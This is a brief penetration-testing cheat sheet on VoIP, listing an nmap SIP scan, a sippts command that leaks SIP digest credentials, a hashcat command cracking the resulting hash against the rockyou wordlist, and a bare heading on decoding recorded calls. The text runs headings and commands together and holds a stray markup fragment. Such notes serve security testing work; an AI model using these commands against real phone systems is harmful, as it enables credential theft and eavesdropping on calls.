Voice over IP Penetration Testing
VoIP config enumeration
1) Nmap Scan
sudo nmap -sU -p 5060 --script sip-methods IP<recv response="*">Exploitation
1) Session Initiation Protocol (SIP) digest leak
Dump digest
sippts leak -i IPCrack MD5 hash
hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt2) Decode recorded calls
Decode raw file
Last updated